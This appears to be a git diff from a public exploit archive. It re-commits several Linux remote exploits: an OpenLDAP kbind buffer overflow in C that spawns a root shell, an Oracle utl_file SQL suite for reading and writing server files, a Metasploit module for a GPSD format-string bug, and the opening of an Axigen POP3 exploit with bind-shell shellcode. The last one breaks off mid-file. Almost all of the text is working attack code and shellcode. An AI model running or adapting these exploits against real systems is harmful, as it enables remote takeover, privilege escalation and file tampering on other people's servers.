return "LDAP_OPERATIONS_ERROR (0x01)"; - case 0x02: return "LDAP_PROTOCOL_ERROR (0x02)"; - case 0x07: return "LDAP_AUTH_METHOD_NOT_SUPPORTED (0x07)\nMost likely cause: the OpenLDAP server was not compiled with --enable-kbind."; - case 0x08: return "LDAP_STRONG_AUTH_REQUIRED (0x08)"; - case 0x0e: return "LDAP_SASL_BIND_IN_PROGRESS (0x0e)"; - case 0x22: return "LDAP_INVALID_DN_SYNTAX (0x22)\nCheck your bind_dn."; - case 0x30: return "LDAP_INAPPROPRIATE_AUTH (0x30)"; - case 0x31: return "LDAP_INVALID_CREDENTIALS (0x31)\nThe bind_dn must exist in the LDAP directory."; - case 0x32: return "LDAP_INSUFFICIENT_ACCESS (0x32)"; - case 0x33: return "LDAP_BUSY (0x33)"; - case 0x34: return "LDAP_UNAVAILABLE (0x34)"; - case 0x35: return "LDAP_UNWILLING_TO_PERFORM (0x35)"; - case 0x50: return "LDAP_OTHER (0x50)"; - case 0x51: return "LDAP_SERVER_DOWN (0x51)"; - case 0x54: return "LDAP_DECODING_ERROR (0x54)"; - default: - sprintf(res_buf, "%x", code); - return res_buf; - } -} - -/* run, code, run */ -int main(int argc, char* argv[]) -{ - char shellcode_buf[SHELLCODE_LEN+1]; - int port, sock, res; - char* dn; - char* p; - - printf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\n"); - printf("\n"); - printf(": Only works on servers compiled with\n"); - printf(" --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no]\n"); - printf("\n"); - printf(": by Solar Eclipse \n\n"); - - if (argc < 3) { - printf(": Usage: %s hostname bind_dn\n", argv[0]); - printf(" The bind_dn must exist in the LDAP directory.\n"); - exit(1); - } - - dn = argv[2]; - - port = 389; /*atoi(argv[2]);*/ - sock = connect_host(argv[1], port); - -/* - send_bind_request(sock, LDAP_AUTH_SIMPLE, dn, "secret"); - res = read_bind_result(sock); - printf("LDAP_AUTH_SIMPLE bind request returned %s\n", ldap_result(res)); -*/ - -/* send_bind_request(sock, LDAP_AUTH_KRBV41, dn, "secret"); - res = read_bind_result(sock); - printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); -*/ - port = get_local_port(sock); - - shellcode[FINDSCKPORTOFS] = (char) (port & 0xff); - shellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); - - build_shellcode(shellcode_buf, SHELLCODE_LEN); - shellcode_buf[SHELLCODE_LEN] = '\0'; - - printf("Sending shellcode\n"); - send_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf); - - sleep(2); - - /* Priming commands */ - write(sock, "echo 'a';\n", 10); - - printf("Reading bind result\n"); - res = read_bind_result(sock); - if (res > 0) - printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); - else { - printf("Spawning shell...\n"); - sh(sock); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2006-12-15] +/* + * openldap-kbind-p00f.c - OpenLDAP kbind remote exploit + * + * Only works on servers compiled with + * --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no] + * + * by Solar Eclipse + * + * Shoutouts to LSD for their l33t asm code and to all 0dd people + * + * Private 0dd code. + * + */ + +#include +#include +#include +#include +#include +#include + +extern int errno; + +#define SHELLCODE_LEN (1250+2+32) +#define SHELLCODE_ADDR 0xbf5feed0 + +#define LDAP_AUTH_SIMPLE 0x80U +#define LDAP_AUTH_KRBV41 0x81U + +#define FINDSCKPORTOFS 46 + +u_char shellcode[]= +/* 72 bytes findsckcode by LSD-pl */ + "\x31\xdb" /* xorl %ebx,%ebx */ + "\x89\xe7" /* movl %esp,%edi */ + "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ + "\x89\x77\x04" /* movl %esi,0x4(%edi) */ + "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ + "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ + "\xb3\x10" /* movb $0x10,%bl */ + "\x89\x19" /* movl %ebx,(%ecx) */ + "\x31\xc9" /* xorl %ecx,%ecx */ + "\xb1\xff" /* movb $0xff,%cl */ + "\x89\x0f" /* movl %ecx,(%edi) */ + "\x51" /* pushl %ecx */ + "\x31\xc0" /* xorl %eax,%eax */ + "\xb0\x66" /* movb $0x66,%al */ + "\xb3\x07" /* movb $0x07,%bl */ + "\x89\xf9" /* movl %edi,%ecx */ + "\xcd\x80" /* int $0x80 */ + "\x59" /* popl %ecx */ + "\x31\xdb" /* xorl %ebx,%ebx */ + "\x39\xd8" /* cmpl %ebx,%eax */ + "\x75\x0a" /* jne */ + "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ + "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ + "\x74\x02" /* je */ + "\xe2\xe0" /* loop */ + "\x89\xcb" /* movl %ecx,%ebx */ + "\x31\xc9" /* xorl %ecx,%ecx */ + "\xb1\x03" /* movb $0x03,%cl */ + "\x31\xc0" /* xorl %eax,%eax */ + "\xb0\x3f" /* movb $0x3f,%al */ + "\x49" /* decl %ecx */ + "\xcd\x80" /* int $0x80 */ + "\x41" /* incl %ecx */ + "\xe2\xf6" /* loop */ + +/* 10 byte setresuid(0,0,0); by core */ + "\x31\xc9" /* xor %ecx,%ecx */ + "\xf7\xe1" /* mul %ecx,%eax */ + "\x51" /* push %ecx */ + "\x5b" /* pop %ebx */ + "\xb0\xa4" /* mov $0xa4,%al */ + "\xcd\x80" /* int $0x80 */ + +/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68""//sh" /* pushl $0x68732f2f */ + "\x68""/bin" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x99" /* cdql */ + "\xb0\x0b" /* movb $0x0b,%al */ + "\xcd\x80" /* int $0x80 */ +; + +#define COMMAND1 "echo 'a'; TERM=xterm; export TERM=xterm; exec bash -i;\n" +#define COMMAND2 "uname -a; id; w;\n" + +/* mixter's code w/enhancements by core */ + +int sh(int sockfd) { + char snd[1024], rcv[1024]; + fd_set rset; + int maxfd, n; + + /* Priming commands */ + strcpy(snd, COMMAND1 "\n"); + write(sockfd, snd, strlen(snd)); + + strcpy(snd, COMMAND2 "\n"); + write(sockfd, snd, strlen(snd)); + + /* Main command loop */ + for (;;) { + FD_SET(fileno(stdin), &rset); + FD_SET(sockfd, &rset); + + maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; + select(maxfd, &rset, NULL, NULL, NULL); + + if (FD_ISSET(fileno(stdin), &rset)) { + bzero(snd, sizeof(snd)); + fgets(snd, sizeof(snd)-2, stdin); + write(sockfd, snd, strlen(snd)); + } + + if (FD_ISSET(sockfd, &rset)) { + bzero(rcv, sizeof(rcv)); + + if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { + printf("Good Bye!\n"); + return 0; + } + + if (n < 0) { + perror("read"); + return 1; + } + + fputs(rcv, stdout); + fflush(stdout); /* keeps output nice */ + } + } /* for(;;) */ +} + +/* Connect to the host */ +int connect_host(char* host, int port) +{ + struct sockaddr_in s_in; + int sock; + + s_in.sin_family = AF_INET; + s_in.sin_addr.s_addr = inet_addr(host); + s_in.sin_port = htons(port); + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { + printf("Could not create a socket\n"); + exit(1); + } + + if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { + printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); + exit(1); + } + + return sock; +} + +int get_local_port(int sock) +{ + struct sockaddr_in s_in; + int namelen = sizeof(s_in); + + if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { + printf("Can't get local port: %s\n", strerror(errno)); + exit(1); + } + + return s_in.sin_port; +} + +int read_data(int sock, char* buf, int len) +{ + int l; + int to_read = len; + + do { + if ((l = read(sock, buf, to_read)) < 0) { + printf("Error in read: %s\n", strerror(errno)); + exit(1); + } + to_read -= len; + } while (to_read > 0); + + return len; +} + +int read_bind_result(int sock) +{ + char buf[1000]; + + read_data(sock, buf, 2); + if (buf[0] != 0x30) { + /* openldap is 0wned :-P */ + return -1; + } + + read_data(sock, &buf[2], buf[1]); + + if ((buf[2] != 0x02) && (buf[3] != 0x01)) { /* message id */ + printf("Malformed bind result\n"); + exit(1); + } + + if (buf[5] != 0x61) { /* message type */ + printf("Malformed bind result\n"); + exit(1); + } + + if (buf[6] < 7) { /* message length */ + printf("Malformed bind result\n"); + exit(1); + } + + if ((buf[7] != 0x0a) && (buf[8] != 0x01)) { /* result code */ + printf("Malformed bind result\n"); + exit(1); + } + + return buf[9]; /* result code */ +} + +int send_bind_request(int sock, char method, char* dn, char* cred) +{ + int cred_len, message_len, request_len; + char krb_bind_request[2000]; + char* p; + + memcpy(krb_bind_request, + "\x30\x82\xff\xff" /* request length */ + "\x02\x01\x01" /* message id = 1 */ + "\x60" /* bind request */ + "\x82\xff\xff" /* message length */ + "\x02\x01\x02" /* LDAP version 3 */ + "\x04", /* dn */ + 15); + + p = &krb_bind_request[15]; + + if (strlen(dn) > 255) { + printf("bind_dn too long\n"); + exit(1); + } + + *p++ = (char)strlen(dn); + strcpy(p, dn); + + p += strlen(dn); + + *p++ = method; /* authentication method */ + *p++ = '\x82'; + + cred_len = strlen(cred); + + *p++ = (char) ((cred_len >> 8) & 0xff); + *p++ = (char) (cred_len & 0xff); + + strcpy(p, cred); + + message_len = 5 + strlen(dn) + 4 + cred_len; + krb_bind_request[9] = (char) ((message_len >> 8) & 0xff); + krb_bind_request[10] = (char) (message_len & 0xff); + + request_len = 7 + message_len; + krb_bind_request[2] = (char) ((request_len >> 8) & 0xff); + krb_bind_request[3] = (char) (request_len & 0xff); + + send(sock, krb_bind_request, 4+request_len, 0); +} + +void build_shellcode(char* p, int len) +{ + int i; + + i = len - 64 - strlen(shellcode); + memset(p, 0x90, i); + strncpy(&p[i], shellcode, strlen(shellcode)); + + for (i = len - 64; i < len; i+= 4) { + *(int*)&p[i] = SHELLCODE_ADDR; + } +} + +char res_buf[30]; + +char* ldap_result(int code) { + switch (code) { + case 0x00: return "LDAP_SUCCESS (0x00)"; + case 0x01: return "LDAP_OPERATIONS_ERROR (0x01)"; + case 0x02: return "LDAP_PROTOCOL_ERROR (0x02)"; + case 0x07: return "LDAP_AUTH_METHOD_NOT_SUPPORTED (0x07)\nMost likely cause: the OpenLDAP server was not compiled with --enable-kbind."; + case 0x08: return "LDAP_STRONG_AUTH_REQUIRED (0x08)"; + case 0x0e: return "LDAP_SASL_BIND_IN_PROGRESS (0x0e)"; + case 0x22: return "LDAP_INVALID_DN_SYNTAX (0x22)\nCheck your bind_dn."; + case 0x30: return "LDAP_INAPPROPRIATE_AUTH (0x30)"; + case 0x31: return "LDAP_INVALID_CREDENTIALS (0x31)\nThe bind_dn must exist in the LDAP directory."; + case 0x32: return "LDAP_INSUFFICIENT_ACCESS (0x32)"; + case 0x33: return "LDAP_BUSY (0x33)"; + case 0x34: return "LDAP_UNAVAILABLE (0x34)"; + case 0x35: return "LDAP_UNWILLING_TO_PERFORM (0x35)"; + case 0x50: return "LDAP_OTHER (0x50)"; + case 0x51: return "LDAP_SERVER_DOWN (0x51)"; + case 0x54: return "LDAP_DECODING_ERROR (0x54)"; + default: + sprintf(res_buf, "%x", code); + return res_buf; + } +} + +/* run, code, run */ +int main(int argc, char* argv[]) +{ + char shellcode_buf[SHELLCODE_LEN+1]; + int port, sock, res; + char* dn; + char* p; + + printf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\n"); + printf("\n"); + printf(": Only works on servers compiled with\n"); + printf(" --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no]\n"); + printf("\n"); + printf(": by Solar Eclipse \n\n"); + + if (argc < 3) { + printf(": Usage: %s hostname bind_dn\n", argv[0]); + printf(" The bind_dn must exist in the LDAP directory.\n"); + exit(1); + } + + dn = argv[2]; + + port = 389; /*atoi(argv[2]);*/ + sock = connect_host(argv[1], port); + +/* + send_bind_request(sock, LDAP_AUTH_SIMPLE, dn, "secret"); + res = read_bind_result(sock); + printf("LDAP_AUTH_SIMPLE bind request returned %s\n", ldap_result(res)); +*/ + +/* send_bind_request(sock, LDAP_AUTH_KRBV41, dn, "secret"); + res = read_bind_result(sock); + printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); +*/ + port = get_local_port(sock); + + shellcode[FINDSCKPORTOFS] = (char) (port & 0xff); + shellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); + + build_shellcode(shellcode_buf, SHELLCODE_LEN); + shellcode_buf[SHELLCODE_LEN] = '\0'; + + printf("Sending shellcode\n"); + send_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf); + + sleep(2); + + /* Priming commands */ + write(sock, "echo 'a';\n", 10); + + printf("Reading bind result\n"); + res = read_bind_result(sock); + if (res > 0) + printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); + else { + printf("Spawning shell...\n"); + sh(sock); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2006-12-15] diff --git a/platforms/linux/remote/2959.sql b/platforms/linux/remote/2959.sql index 8da0f3ca3..dd8f365dc 100755 --- a/platforms/linux/remote/2959.sql +++ b/platforms/linux/remote/2959.sql @@ -1,77 +1,77 @@ --- --- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ --- --- raptor_orafile.sql - file system access suite for oracle --- Copyright (c) 2006 Marco Ivaldi --- --- This is an example file system access suite for Oracle based on the utl_file --- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to remotely --- read/write OS files with the privileges of the RDBMS user, without the need --- for any special privileges (CONNECT and RESOURCE roles are more than enough). --- --- The database _must_ be configured with a non-NULL utl_file_dir value --- (preferably '*'). Check it using the following query: --- SQL> select name, value from v$parameter where name = 'utl_file_dir'; --- --- If you have the required privileges (ALTER SYSTEM) and feel brave --- enough to perform a DBMS shutdown/startup, you can consider modifying --- this parameter yourself, using the following PL/SQL: --- SQL> alter system set utl_file_dir='*' scope =spfile; --- --- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql --- --- Usage example: --- $ sqlplus scott/tiger --- [...] --- SQL> @raptor_orafile.sql --- [...] --- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts file'); --- SQL> exec utlwritefile('/tmp', 'mytest', '+ +'); --- SQL> set serveroutput on; --- SQL> exec utlreadfile('/tmp', 'mytest'); --- # this is a fake .rhosts file --- + + --- End of file. --- - --- file reading module --- --- usage: set serveroutput on; --- exec utlreadfile('/dir', 'file'); -create or replace procedure utlreadfile(p_directory in varchar2, p_filename in varchar2) as -buffer varchar2(260); -fd utl_file.file_type; -begin - fd := utl_file.fopen(p_directory, p_filename, 'r'); - dbms_output.enable(1000000); - loop - utl_file.get_line(fd, buffer, 254); - dbms_output.put_line(buffer); - end loop; - exception when no_data_found then - dbms_output.put_line('End of file.'); - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; - when others then - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; -end; -/ - --- file writing module --- --- usage: exec utlwritefile('/dir', 'file', 'line to append'); -create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as -fd utl_file.file_type; -begin - fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append - utl_file.put_line(fd, p_line); - if (utl_file.is_open(fd) = true) then - utl_file.fclose(fd); - end if; -end; -/ - --- milw0rm.com [2006-12-19] +-- +-- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ +-- +-- raptor_orafile.sql - file system access suite for oracle +-- Copyright (c) 2006 Marco Ivaldi +-- +-- This is an example file system access suite for Oracle based on the utl_file +-- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to remotely +-- read/write OS files with the privileges of the RDBMS user, without the need +-- for any special privileges (CONNECT and RESOURCE roles are more than enough). +-- +-- The database _must_ be configured with a non-NULL utl_file_dir value +-- (preferably '*'). Check it using the following query: +-- SQL> select name, value from v$parameter where name = 'utl_file_dir'; +-- +-- If you have the required privileges (ALTER SYSTEM) and feel brave +-- enough to perform a DBMS shutdown/startup, you can consider modifying +-- this parameter yourself, using the following PL/SQL: +-- SQL> alter system set utl_file_dir='*' scope =spfile; +-- +-- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql +-- +-- Usage example: +-- $ sqlplus scott/tiger +-- [...] +-- SQL> @raptor_orafile.sql +-- [...] +-- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts file'); +-- SQL> exec utlwritefile('/tmp', 'mytest', '+ +'); +-- SQL> set serveroutput on; +-- SQL> exec utlreadfile('/tmp', 'mytest'); +-- # this is a fake .rhosts file +-- + + +-- End of file. +-- + +-- file reading module +-- +-- usage: set serveroutput on; +-- exec utlreadfile('/dir', 'file'); +create or replace procedure utlreadfile(p_directory in varchar2, p_filename in varchar2) as +buffer varchar2(260); +fd utl_file.file_type; +begin + fd := utl_file.fopen(p_directory, p_filename, 'r'); + dbms_output.enable(1000000); + loop + utl_file.get_line(fd, buffer, 254); + dbms_output.put_line(buffer); + end loop; + exception when no_data_found then + dbms_output.put_line('End of file.'); + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; + when others then + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; +end; +/ + +-- file writing module +-- +-- usage: exec utlwritefile('/dir', 'file', 'line to append'); +create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as +fd utl_file.file_type; +begin + fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append + utl_file.put_line(fd, p_line); + if (utl_file.is_open(fd) = true) then + utl_file.fclose(fd); + end if; +end; +/ + +-- milw0rm.com [2006-12-19] diff --git a/platforms/linux/remote/296.c b/platforms/linux/remote/296.c index ca967e196..e436298b6 100755 --- a/platforms/linux/remote/296.c +++ b/platforms/linux/remote/296.c @@ -198,6 +198,6 @@ void printe(char *err,short e){ if(e)exit(1); return; } - - -// milw0rm.com [2004-05-05] + + +// milw0rm.com [2004-05-05] diff --git a/platforms/linux/remote/303.pl b/platforms/linux/remote/303.pl index 3d7dc069d..3ca5b9a1a 100755 --- a/platforms/linux/remote/303.pl +++ b/platforms/linux/remote/303.pl @@ -147,6 +147,6 @@ print $sc $line; } close($sc); print "Good bye!!\n"; - - -# milw0rm.com [2004-06-25] + + +# milw0rm.com [2004-06-25] diff --git a/platforms/linux/remote/307.py b/platforms/linux/remote/307.py index ab61113a9..92702125d 100755 --- a/platforms/linux/remote/307.py +++ b/platforms/linux/remote/307.py @@ -146,6 +146,6 @@ r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3])) #r.exploit(0x0804c418, 0xbffff9e8) #r.force(0x0804c418, 0xbffffa00, 0xbffff800) r.run() - - -# milw0rm.com [2004-06-25] + + +# milw0rm.com [2004-06-25] diff --git a/platforms/linux/remote/308.c b/platforms/linux/remote/308.c index 042741741..49f58ad0c 100755 --- a/platforms/linux/remote/308.c +++ b/platforms/linux/remote/308.c @@ -251,6 +251,6 @@ close(clisock_fd); looking(work); return SUCCESS; } - - -// milw0rm.com [2004-07-04] + + +// milw0rm.com [2004-07-04] diff --git a/platforms/linux/remote/3099.pm b/platforms/linux/remote/3099.pm index d56f08c73..f90ad2a5a 100755 --- a/platforms/linux/remote/3099.pm +++ b/platforms/linux/remote/3099.pm @@ -1,124 +1,124 @@ -package Msf::Exploit::gpsd_format_string; -use base "Msf::Exploit"; -use strict; -use Pex::Text; -use IO::Socket; - -my $advanced = { }; - -my $info = { - 'Name' => 'Berlios GPSD Format String Vulnerability', - 'Version' => '$ 1.0 $', - 'Authors' => [ 'Enseirb ', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'linux' ], - 'Priv' => 1, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 2947], - - }, - - 'Payload' => - { - 'Space' => 1004, - 'BadChars' => "\x00\x0a\x0d\x0c", - }, - - 'Targets' => - - [ - [ "gpsd-1.91-1.i386.rpm", 0x0804f250,0x41424344 ], # .rpms Tested on Redhat 9.0 - [ "gpsd-1.92-1.i386.rpm", 0x0804f630,0x41424344 ], - [ "gpsd-1.93-1.i386.rpm", 0x0804e154,0x41424344 ], - [ "gpsd-1.94-1.i386.rpm", 0x0804f260,0x41424344 ], - [ "gpsd-1.95-1.i386.rpm", 0x0804f268,0x41424344 ], - [ "gpsd-1.96-1.i386.rpm", 0x41424344,0x41424344 ], - [ "gpsd-1.97-1.i386.rpm", 0x0804b14c,0x41424344 ], - [ "gpsd-2.1-1.i386.rpm", 0x0804c7a0,0x41424344 ], - [ "gpsd-2.2-1.i386.rpm", 0x0804c7a0,0x41424344 ], - [ "gpsd-2.3-1.i386.rpm", 0x0804c730,0xbfffd661 ], - [ "gpsd-2.4-1.i386.rpm", 0x0804c7b8,0xbfffde71 ], - [ "gpsd-2.5-1.i386.rpm", 0x0804c7dc,0xbfffdc09 ], - [ "gpsd-2.6-1.i386.rpm", 0x0804c730,0xbffff100 ], - [ "gpsd-2.7-1.i386.rpm", 0x0804c5bc,0xbfffcabc ], - [ "gpsd_2.6-1_i386.deb", 0x0804c7c4,0xbfffedc8 ], - [ "gpsd_2.7-1_i386.deb", 0x0804c6c4,0xbfffc818 ], - [ "gpsd_2.7-2_i386.deb", 0x0804c770,0xbfffee70 ], - ["SuSE 9.1 compiled 2.0", 0x0804c818,0xbfffe148 ], - [ "Slackware 9.0 compiled 2.0", 0x0804b164,0xbfffd7d6 ], - [ "Slackware 9.0 compiled 2.7 ", 0x0804c3ec,0xbfffe65c ], - [ "Debug ", 0x41424344,0xdeadbeef ], - ], - - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a format string vulnerability in the Berlios GPSD server. - This vulnerability was discovered by Kevin Finisterre. - }), - - 'Keys' => ['gpsd'], - - 'DisclosureDate' => 'May 25 2005', - - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_idx = $self->GetVar('TARGET'); - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - $self->Print("[*] Reading information from target " . $target_host . ": "); - - my $offset = 17; - my $dump_fmt = 7; - my $al = 3; - my ($hi,$lo); - my ($shift0,$shift1); - my $buf; - - $hi = ($target->[2] >> 0) & 0xffff; - $lo = ($target->[2] >> 16) & 0xffff; - - $shift0 = sprintf("%d",$hi) - sprintf("%d",$offset) - ($dump_fmt * 8 + 16 + $al); - $shift1 = (sprintf("%d",0x10000) + sprintf("%d",$lo)) - sprintf("%d",$hi); - - $buf = "A" x 3 . "B" x 4; - $buf .= pack('V',$target->[1]); - $buf .= "B" x 4; - $buf .= pack('V',$target->[1] + 0x2); - $buf .= "%.8x" x7 ."%.".$shift0."lx%hn"."%.".$shift1."lx%hn"; - $buf .= $self->MakeNops(3000) . $shellcode ; - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $s->Send($buf); - $s->Close(); - - return; -} - -1; - -# milw0rm.com [2007-01-08] +package Msf::Exploit::gpsd_format_string; +use base "Msf::Exploit"; +use strict; +use Pex::Text; +use IO::Socket; + +my $advanced = { }; + +my $info = { + 'Name' => 'Berlios GPSD Format String Vulnerability', + 'Version' => '$ 1.0 $', + 'Authors' => [ 'Enseirb ', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'linux' ], + 'Priv' => 1, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 2947], + + }, + + 'Payload' => + { + 'Space' => 1004, + 'BadChars' => "\x00\x0a\x0d\x0c", + }, + + 'Targets' => + + [ + [ "gpsd-1.91-1.i386.rpm", 0x0804f250,0x41424344 ], # .rpms Tested on Redhat 9.0 + [ "gpsd-1.92-1.i386.rpm", 0x0804f630,0x41424344 ], + [ "gpsd-1.93-1.i386.rpm", 0x0804e154,0x41424344 ], + [ "gpsd-1.94-1.i386.rpm", 0x0804f260,0x41424344 ], + [ "gpsd-1.95-1.i386.rpm", 0x0804f268,0x41424344 ], + [ "gpsd-1.96-1.i386.rpm", 0x41424344,0x41424344 ], + [ "gpsd-1.97-1.i386.rpm", 0x0804b14c,0x41424344 ], + [ "gpsd-2.1-1.i386.rpm", 0x0804c7a0,0x41424344 ], + [ "gpsd-2.2-1.i386.rpm", 0x0804c7a0,0x41424344 ], + [ "gpsd-2.3-1.i386.rpm", 0x0804c730,0xbfffd661 ], + [ "gpsd-2.4-1.i386.rpm", 0x0804c7b8,0xbfffde71 ], + [ "gpsd-2.5-1.i386.rpm", 0x0804c7dc,0xbfffdc09 ], + [ "gpsd-2.6-1.i386.rpm", 0x0804c730,0xbffff100 ], + [ "gpsd-2.7-1.i386.rpm", 0x0804c5bc,0xbfffcabc ], + [ "gpsd_2.6-1_i386.deb", 0x0804c7c4,0xbfffedc8 ], + [ "gpsd_2.7-1_i386.deb", 0x0804c6c4,0xbfffc818 ], + [ "gpsd_2.7-2_i386.deb", 0x0804c770,0xbfffee70 ], + ["SuSE 9.1 compiled 2.0", 0x0804c818,0xbfffe148 ], + [ "Slackware 9.0 compiled 2.0", 0x0804b164,0xbfffd7d6 ], + [ "Slackware 9.0 compiled 2.7 ", 0x0804c3ec,0xbfffe65c ], + [ "Debug ", 0x41424344,0xdeadbeef ], + ], + + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a format string vulnerability in the Berlios GPSD server. + This vulnerability was discovered by Kevin Finisterre. + }), + + 'Keys' => ['gpsd'], + + 'DisclosureDate' => 'May 25 2005', + + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_idx = $self->GetVar('TARGET'); + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + + $self->Print("[*] Reading information from target " . $target_host . ": "); + + my $offset = 17; + my $dump_fmt = 7; + my $al = 3; + my ($hi,$lo); + my ($shift0,$shift1); + my $buf; + + $hi = ($target->[2] >> 0) & 0xffff; + $lo = ($target->[2] >> 16) & 0xffff; + + $shift0 = sprintf("%d",$hi) - sprintf("%d",$offset) - ($dump_fmt * 8 + 16 + $al); + $shift1 = (sprintf("%d",0x10000) + sprintf("%d",$lo)) - sprintf("%d",$hi); + + $buf = "A" x 3 . "B" x 4; + $buf .= pack('V',$target->[1]); + $buf .= "B" x 4; + $buf .= pack('V',$target->[1] + 0x2); + $buf .= "%.8x" x7 ."%.".$shift0."lx%hn"."%.".$shift1."lx%hn"; + $buf .= $self->MakeNops(3000) . $shellcode ; + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $s->Send($buf); + $s->Close(); + + return; +} + +1; + +# milw0rm.com [2007-01-08] diff --git a/platforms/linux/remote/3329.c b/platforms/linux/remote/3329.c index 21200d5e1..1687773c1 100755 --- a/platforms/linux/remote/3329.c +++ b/platforms/linux/remote/3329.c @@ -1,247 +1,247 @@ -/* axiagen.c - * - * Axigen eMail Server v2.0 (beta) - * by fuGich Tue Dec 5 2006 - * - * thanks to mu-b - * - * - Tested on: Axigen V2 (beta) - * - * logType for the pop3 service must be "system" and - * the logLevel set to any number with 4th bit set - * - * remote shell format string vulnerability in pop3 - * /bin/sh to bind to port 31337 - * - * optimised format string generated with libforSC - * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated - * - */ - -#include -#include -#include -#include -#include - - -#define DEF_PORT 110 -#define PORT_POP3 DEF_PORT - - -char formatString[] = - - // plt fixup code - - "\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx - "\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx) - "\x8d\x52\x04" // lea 0x4(%edx),%edx - "\xc6\x02\xaa" // movb $0xaa,(%edx) - "\x90\x90\x90" // make divisible by 8 - - // - // bind shell with fork to port 31337 98 bytes - // - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - - // - // <_doint>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - "\x5b" // pop %ebx - "\x5d" // pop %ebp - "\x52" // push %edx - "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\xb3\x04" // mov $0x4,%bl - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - // - // 